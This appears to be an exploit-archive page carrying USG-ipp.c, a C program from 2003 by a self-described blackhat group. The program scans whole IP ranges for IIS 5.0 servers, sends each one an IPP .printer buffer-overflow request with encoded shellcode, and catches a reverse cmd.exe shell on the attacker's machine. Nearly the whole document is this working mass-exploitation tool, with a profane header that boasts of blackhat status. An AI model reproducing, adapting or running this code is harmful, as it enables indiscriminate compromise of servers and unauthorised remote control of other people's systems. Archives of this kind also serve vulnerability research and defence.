USG-ipp.c

USG-ipp.c: Posted Mar 13, 2003; Authored by USG | Site usg.org.uk; IS 5.0 / Windows 2000 mass scanner / rooter which spawns a shell from a vulnerable system back over to the machine from where the attack is launched.; tags | exploit, shell; systems | windows; SHA-256 | 24f0ee8484f067e1f4b58579af1d7deca6ff9ef430a2ae999a08629bbc3e11c1; Download | Favorite | View
USG-ipp.c

/*
mass IPP by rD of USG
fuck all you ./hack scriptkiddies
fuck all ./juno kids
greetz to my brother bobbyd1gital of FBH
ain't no one online like bobby  to me!
ain't no one like Cc0d3r to me IRL
Inkubus stop posting advisories we are fucken blackhats not some brainwashed whitehats security industry slaves
shouts to v0id, NtWaK0, scut,c1sco, PHC and all the blackhats
the rap shit is eating my mind

rD of USG (UNIX Security Guards)
usg@africamail.com
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>

#include <arpa/inet.h>
#include <sys/errno.h>
#include <signal.h>
#include <fcntl.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>

extern int errno;

#define LOCAL_IP "192.168.0.1" /* put your real ip here if you want to get the shell else you won't */
#define TIMEOUT  3
#define SHELL_TIMEOUT 6
#define BANNER "Microsoft-IIS/5.0"
#define SEND "HEAD / HTTP/1.0\r\n\r\n\r\n"
char server[500];
char *result;


void usage(char *);
void try(char *);
int jill(char *, char *);
static int i,x,y,z;
char A(char *);
char B(char *);
char C(char *);
char D(char *);
static char a[4],b[8],c[12],ip[17];
void shell(void);
/* main */

int main(int argc,char *argv[])
{

fprintf(stdout,"\n\n\t\t mass IPP for IIS/5.0 by rD\n\n");
if(argc != 3)
{
usage(argv[0]);
exit(-1);
}



while ((i = getopt (argc, argv, ":a:b:c:d:")) != EOF)
{
switch(i)
{

      case 'h': usage(argv[1]);
      break;

         case 'a': 
snprintf(a,sizeof(a),"%s",optarg);
                A(a);
         break;

  case 'b': snprintf(b,sizeof(b),"%s",optarg);
  B(b);
  break;

case 'c': snprintf(c,sizeof(c),"%s",optarg);
C(c);
break;

case 'd':try(optarg);
break;
}

}

}

/* end of main */

/* A */
char A(char *Aclass)
{

if(strlen(Aclass)>3)
{
printf("wrong range");
exit(-1);
}

for(x=0;x<=255;++x)
{
  for(y=0;y<=255;++y)
  {
for(z=0;z<=255;++z)
{
snprintf(ip,sizeof(ip),"%s.%d.%d.%d",Aclass,x,y,z);
printf("trying %s\t->\t",ip);
try(ip);
}  
  }
}

}

/* end of A */



/* B */
char B(char *Bclass)
{
for(y=0;y<=255;++y)
{
  for(z=0;z<=255;++z)
  {
  snprintf(ip,sizeof(ip),"%s.%d.%d",Bclass,y,z);
  printf("trying %s\t->\t",ip);
  try(ip);

  }


}


}

/* end of B */


/* C */
char C(char *Cclass)
{
for(z=0;z<=255;++z)
{
if( !strcmp(ip,".4") ) exit(EXIT_FAILURE);
snprintf(ip,sizeof(ip),"%s.%d",Cclass,z);
printf("trying %s\t->\t",ip);
try(ip);


}

}
  
/* end of C */


/* try */

void try(char *IP)
{
int sock,errex;
int numbytes = 0 , opt;
struct sockaddr_in remote;
fd_set wset;
struct timeval tv;

close(sock);
sock = socket(AF_INET,SOCK_STREAM,0);
remote.sin_port = htons(80);
remote.sin_addr.s_addr = inet_addr(IP);
remote.sin_family= AF_INET;
memset(remote.sin_zero,0,sizeof(remote.sin_zero));

fflush(stdout);
if (sock == -1)
{
perror("socket creation error");
return;
}
FD_ZERO( &wset );
FD_SET( sock , &wset );
tv.tv_sec  = TIMEOUT;
tv.tv_usec = 0;

if( fcntl( sock , F_SETFL , O_NONBLOCK ) == -1 )
{
 perror("fcntl error");
 return;
}

 errex = connect(sock,(struct sockaddr *)&remote,sizeof(struct sockaddr));

 if( errno != EINPROGRESS && errno != EISCONN )
 {
  perror("connection error");
  return;
 }

opt = select(sock+1,NULL,&wset,NULL,&tv);

if( fcntl( sock , F_SETFL , 0 ) == -1 )
{
 perror("fcntl error");
 return;
}

if( opt == -1 )
{
 perror("select error");
 return;
}
if( !opt )
{
printf("connection timed out..\n");
return;
}

numbytes = send(sock,SEND,sizeof(SEND),0);
if( numbytes == -1 )
{ 
perror("connection error"); 
return;
}
numbytes = recv(sock,server,sizeof(server),0);
if( numbytes == -1 )
{
perror("recv");
return;
}

server[numbytes]='\0';
if(strlen(server) == 0)
{
printf("connection closed\n");
return;
}
result = strstr(server,"Server:");
if( result  == NULL)
{
printf("no server string found\n");
return;

}
*(strchr(result, '\n')) = '\0';
printf("%s\n",result);

if(strstr(result,BANNER) != NULL)
{
printf("exploiting ...\n");
jill(IP, LOCAL_IP);
}
else
if(strstr(result,BANNER) == NULL)
{
close(sock);
return;
}
close(sock);
}
/* end of try */




/* jill */

int jill(char *victim, char *attacker)
{

#define aport 6660

unsigned char sploit[]=
"\x47\x45\x54\x20\x2f\x4e\x55\x4c\x4c\x2e\x70\x72\x69\x6e\x74\x65\x72\x20"
"\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x42\x65\x61\x76\x75\x68\x3a\x20"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\xeb\x03\x5d\xeb\x05\xe8\xf8\xff\xff\xff\x83\xc5\x15\x90\x90\x90"
"\x8b\xc5\x33\xc9\x66\xb9\xd7\x02\x50\x80\x30\x95\x40\xe2\xfa\x2d\x95\x95"
"\x64\xe2\x14\xad\xd8\xcf\x05\x95\xe1\x96\xdd\x7e\x60\x7d\x95\x95\x95\x95"
"\xc8\x1e\x40\x14\x7f\x9a\x6b\x6a\x6a\x1e\x4d\x1e\xe6\xa9\x96\x66\x1e\xe3"
"\xed\x96\x66\x1e\xeb\xb5\x96\x6e\x1e\xdb\x81\xa6\x78\xc3\xc2\xc4\x1e\xaa"
"\x96\x6e\x1e\x67\x2c\x9b\x95\x95\x95\x66\x33\xe1\x9d\xcc\xca\x16\x52\x91"
"\xd0\x77\x72\xcc\xca\xcb\x1e\x58\x1e\xd3\xb1\x96\x56\x44\x74\x96\x54\xa6"
"\x5c\xf3\x1e\x9d\x1e\xd3\x89\x96\x56\x54\x74\x97\x96\x54\x1e\x95\x96\x56"
"\x1e\x67\x1e\x6b\x1e\x45\x2c\x9e\x95\x95\x95\x7d\xe1\x94\x95\x95\xa6\x55"
"\x39\x10\x55\xe0\x6c\xc7\xc3\x6a\xc2\x41\xcf\x1e\x4d\x2c\x93\x95\x95\x95"
"\x7d\xce\x94\x95\x95\x52\xd2\xf1\x99\x95\x95\x95\x52\xd2\xfd\x95\x95\x95"
"\x95\x52\xd2\xf9\x94\x95\x95\x95\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x85\xc5"
"\x18\xd2\x81\xc5\x6a\xc2\x55\xff\x95\x18\xd2\xf1\xc5\x18\xd2\x8d\xc5\x18"
"\xd2\x89\xc5\x6a\xc2\x55\x52\xd2\xb5\xd1\x95\x95\x95\x18\xd2\xb5\xc5\x6a"
"\xc2\x51\x1e\xd2\x85\x1c\xd2\xc9\x1c\xd2\xf5\x1e\xd2\x89\x1c\xd2\xcd\x14"
"\xda\xd9\x94\x94\x95\x95\xf3\x52\xd2\xc5\x95\x95\x18\xd2\xe5\xc5\x18\xd2"
"\xb5\xc5\xa6\x55\xc5\xc5\xc5\xff\x94\xc5\xc5\x7d\x95\x95\x95\x95\xc8\x14"
"\x78\xd5\x6b\x6a\x6a\xc0\xc5\x6a\xc2\x5d\x6a\xe2\x85\x6a\xc2\x71\x6a\xe2"
"\x89\x6a\xc2\x71\xfd\x95\x91\x95\x95\xff\xd5\x6a\xc2\x45\x1e\x7d\xc5\xfd"
"\x94\x94\x95\x95\x6a\xc2\x7d\x10\x55\x9a\x10\x3f\x95\x95\x95\xa6\x55\xc5"
"\xd5\xc5\xd5\xc5\x6a\xc2\x79\x16\x6d\x6a\x9a\x11\x02\x95\x95\x95\x1e\x4d"
"\xf3\x52\x92\x97\x95\xf3\x52\xd2\x97\x8e\xac\x52\xd2\x91\x5e\x38\x4c\xb3"
"\xff\x85\x18\x92\xc5\xc6\x6a\xc2\x61\xff\xa7\x6a\xc2\x49\xa6\x5c\xc4\xc3"
"\xc4\xc4\xc4\x6a\xe2\x81\x6a\xc2\x59\x10\x55\xe1\xf5\x05\x05\x05\x05\x15"
"\xab\x95\xe1\xba\x05\x05\x05\x05\xff\x95\xc3\xfd\x95\x91\x95\x95\xc0\x6a"
"\xe2\x81\x6a\xc2\x4d\x10\x55\xe1\xd5\x05\x05\x05\x05\xff\x95\x6a\xa3\xc0"
"\xc6\x6a\xc2\x6d\x16\x6d\x6a\xe1\xbb\x05\x05\x05\x05\x7e\x27\xff\x95\xfd"
"\x95\x91\x95\x95\xc0\xc6\x6a\xc2\x69\x10\x55\xe9\x8d\x05\x05\x05\x05\xe1"
"\x09\xff\x95\xc3\xc5\xc0\x6a\xe2\x8d\x6a\xc2\x41\xff\xa7\x6a\xc2\x49\x7e"
"\x1f\xc6\x6a\xc2\x65\xff\x95\x6a\xc2\x75\xa6\x55\x39\x10\x55\xe0\x6c\xc4"
"\xc7\xc3\xc6\x6a\x47\xcf\xcc\x3e\x77\x7b\x56\xd2\xf0\xe1\xc5\xe7\xfa\xf6"
"\xd4\xf1\xf1\xe7\xf0\xe6\xe6\x95\xd9\xfa\xf4\xf1\xd9\xfc\xf7\xe7\xf4\xe7"
"\xec\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0\xc5\xfc\xe5\xf0\x95\xd2\xf0\xe1\xc6"
"\xe1\xf4\xe7\xe1\xe0\xe5\xdc\xfb\xf3\xfa\xd4\x95\xd6\xe7\xf0\xf4\xe1\xf0"
"\xc5\xe7\xfa\xf6\xf0\xe6\xe6\xd4\x95\xc5\xf0\xf0\xfe\xdb\xf4\xf8\xf0\xf1"
"\xc5\xfc\xe5\xf0\x95\xd2\xf9\xfa\xf7\xf4\xf9\xd4\xf9\xf9\xfa\xf6\x95\xc2"
"\xe7\xfc\xe1\xf0\xd3\xfc\xf9\xf0\x95\xc7\xf0\xf4\xf1\xd3\xfc\xf9\xf0\x95"
"\xc6\xf9\xf0\xf0\xe5\x95\xd0\xed\xfc\xe1\xc5\xe7\xfa\xf6\xf0\xe6\xe6\x95"
"\xd6\xf9\xfa\xe6\xf0\xdd\xf4\xfb\xf1\xf9\xf0\x95\xc2\xc6\xda\xd6\xde\xa6"
"\xa7\x95\xc2\xc6\xd4\xc6\xe1\xf4\xe7\xe1\xe0\xe5\x95\xe6\xfa\xf6\xfe\xf0"
"\xe1\x95\xf6\xf9\xfa\xe6\xf0\xe6\xfa\xf6\xfe\xf0\xe1\x95\xf6\xfa\xfb\xfb"
"\xf0\xf6\xe1\x95\xe6\xf0\xfb\xf1\x95\xe7\xf0\xf6\xe3\x95\xf6\xf8\xf1\xbb"
"\xf0\xed\xf0\x95\x0d\x0a\x48\x6f\x73\x74\x3a\x20\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x33"
"\xc0\xb0\x90\x03\xd8\x8b\x03\x8b\x40\x60\x33\xdb\xb3\x24\x03\xc3\xff\xe0"
"\xeb\xb9\x90\x90\x05\x31\x8c\x6a\x0d\x0a\x0d\x0a";

        int                     s;
        unsigned short int      a_port;
        unsigned long           a_host;
        struct hostent          *ht;
        struct sockaddr_in      sin;



        if ((ht = gethostbyname(victim)) == NULL){
                hstrerror(h_errno);
        }

        sin.sin_port = htons(80);
        a_port = htons(aport);
        a_port^=0x9595;

        sin.sin_family = AF_INET;
        sin.sin_addr = *((struct in_addr *)ht->h_addr);

        if ((ht = gethostbyname(attacker)) == 0){
                herror(attacker);
return;
        }

        a_host = *((unsigned long *)ht->h_addr);
        a_host^=0x95959595;

        sploit[441]= (a_port) & 0xff;
        sploit[442]= (a_port >> 8) & 0xff;

        sploit[446]= (a_host) & 0xff;
        sploit[447]= (a_host >> 8) & 0xff;
        sploit[448]= (a_host >> 16) & 0xff;
        sploit[449]= (a_host >> 24) & 0xff;

        if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
                perror("socket");
return;
       
 }

        printf("\nconnecting to %s\n",victim);

        if ((connect(s, (struct sockaddr *) &sin, sizeof(sin))) == -1){
                perror("connect");
return;
        }

        write(s, sploit, strlen(sploit));
        sleep (1);
        close (s);

printf("shellcode excuted, waiting for shell...\n");
//call the shell here
shell();
return;
}

/* end of jill */




/* usage */

void usage(char *prog)
{

fprintf(stderr, "usage %s <-a> xxx\n"
    "           <-b> xxx.xxx\n"
    "           <-c> xxx.xxx.xxx\n"
    "     <-d> <hostname>\n",prog);      

}
/* end of usgae */

/* start of shell */
void shell()
{


 int recvsock , newsock , numbytes ,  size , opt;
 char recvbuffer[2048];
 fd_set rs , rsmaster , wset;
 struct sockaddr_in local,incomming;
 struct timeval tv;

 size = sizeof( struct sockaddr );

 recvsock = socket(AF_INET , SOCK_STREAM , 0 );
 if( recvsock == -1 )
 {
  perror("socket creation error");
  return;
 }
 
 local.sin_addr.s_addr = INADDR_ANY;
 local.sin_port        = htons(6660);
 local.sin_family      = AF_INET;
 memset( local.sin_zero , 0 , sizeof(local.sin_zero) );

 if( ( bind(recvsock , (struct sockaddr *)&local , sizeof(struct sockaddr) ) 
) == -1 )
 {
  perror("bind error");
  return;
 }

 if( listen(recvsock , 10 ) == -1 )
 {
  perror("listen error");
  return;
 }
 
 FD_ZERO( &rsmaster );
 FD_ZERO( &wset );

 FD_SET( recvsock , &wset );
 tv.tv_sec  = SHELL_TIMEOUT;
 tv.tv_usec = 0;

 if( fcntl( recvsock , F_SETFL , O_NONBLOCK ) == -1 )
 {
  perror("fcntl error");
  return;
 }
 newsock = accept( recvsock , (struct sockaddr *)&incomming , &size);
 opt = select( recvsock+1 , &rsmaster , NULL , NULL , &tv );
 
 if( opt == -1 )
 {
  perror("select error");
  return;
 }

 if( !opt )
 {
  printf("damn it's patched!\n");
close(newsock);
close(recvsock);  
return;
 }
 
 if( fcntl( recvsock , F_SETFL , 0 ) == -1 )
 {
  perror("fcntl error");
  return;
 }
 printf("Incomming connection from %s\n",inet_ntoa(incomming.sin_addr));
 printf("Spawning cmd.exe\n\n");
 if( newsock == -1 )
 {
  perror("accept error");
  return;
 }
 

 while(1)
 {
  rs = rsmaster;
  
 FD_SET( newsock , &rsmaster );
 FD_SET( 0 , &rsmaster );
  
  opt = select( newsock + 1 , &rs , NULL , NULL , NULL );

  if( opt == -1 )
  {
   perror("select error");
   return;
  }
  
  if( FD_ISSET( 0 , &rs ) )
  {
   fgets(recvbuffer,sizeof(recvbuffer)-1,stdin);
   snprintf(recvbuffer,sizeof(recvbuffer),"%s\r\n",recvbuffer);
   numbytes = send(newsock , recvbuffer , strlen(recvbuffer) , 0);
   if( numbytes == -1 )
   {
    perror("send error");
    return;
   }
  }
  
  else if( FD_ISSET( newsock , &rs ) )
  {
   numbytes = recv( newsock , recvbuffer , sizeof(recvbuffer) - 1 , 0 );
   if( numbytes == -1 )
   {
    perror("recv error");
    return;
   }
   recvbuffer[numbytes-2] = '\n';
   recvbuffer[numbytes-1] = 0x0;
   printf("%s",recvbuffer);
  }

 }

}
/* end of shell */

/* EOF */
Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files
File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other
USG-ipp.c

USG-ipp.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

USG-ipp.c

Share This

USG-ipp.c

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems
